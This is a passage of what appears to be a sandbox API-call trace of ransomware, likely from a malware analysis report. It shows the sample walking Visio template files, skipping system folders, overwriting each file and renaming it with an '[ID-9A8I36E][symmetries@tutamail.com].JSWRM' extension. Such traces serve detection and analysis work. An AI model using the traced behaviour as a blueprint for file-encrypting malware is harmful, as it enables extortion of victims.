(HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0147.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0147.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0147.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0147.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0147.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0147.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0147.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.810] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x30ca74c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x30ca74c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x30ca74c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x22254, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECHIP_U.VSSX", cAlternateFileName="EECHIP~1.VSS")) returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2=".") returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="..") returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="...") returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="windows") returned -1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="recovery") returned -1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="perflogs") returned -1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="documents and settings") returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="system volume information") returned -1 [0147.810] lstrcmpiW (lpString1="EECHIP_U.VSSX", lpString2="msocache") returned -1 [0147.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0147.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0147.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0147.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0147.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0147.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0147.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.812] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=139860) returned 1 [0147.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22250) returned 0x2501e8 [0147.812] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22250, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x22250, lpOverlapped=0x0) returned 1 [0147.823] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.823] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22250, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x22250, lpOverlapped=0x0) returned 1 [0147.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.825] CloseHandle (hObject=0x314) returned 1 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0147.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0147.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0147.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0147.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0147.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0147.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0147.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.827] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a6bc7c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a6bc7c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a91d98, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3e21, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECHIP_U.VSTX", cAlternateFileName="EECHIP~2.VST")) returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2=".") returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="..") returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="...") returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="windows") returned -1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="recovery") returned -1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="perflogs") returned -1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="documents and settings") returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="system volume information") returned -1 [0147.830] lstrcmpiW (lpString1="EECHIP_U.VSTX", lpString2="msocache") returned -1 [0147.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0147.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0147.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0147.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.832] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15905) returned 1 [0147.832] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e20) returned 0x27b348 [0147.832] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3e20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3e20, lpOverlapped=0x0) returned 1 [0147.835] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.835] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3e20, lpOverlapped=0x0) returned 1 [0147.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.835] CloseHandle (hObject=0x314) returned 1 [0147.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0147.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0147.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0147.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0147.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0147.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.836] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0147.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0147.837] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ec2a6a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ec2a6a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ee8cf4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17309, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECOMP_M.VSSX", cAlternateFileName="EECOMP~2.VSS")) returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2=".") returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="..") returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="...") returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="windows") returned -1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="recovery") returned -1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="perflogs") returned -1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="documents and settings") returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="system volume information") returned -1 [0147.837] lstrcmpiW (lpString1="EECOMP_M.VSSX", lpString2="msocache") returned -1 [0147.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECOMP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0147.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECOMP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0147.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0147.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0147.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.839] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=94985) returned 1 [0147.839] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17300) returned 0x2501e8 [0147.839] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x17300, lpOverlapped=0x0) returned 1 [0147.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.850] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x17300, lpOverlapped=0x0) returned 1 [0147.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.851] CloseHandle (hObject=0x314) returned 1 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0147.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0147.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0147.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0147.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0147.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0147.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0147.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0147.853] FindNextFileW 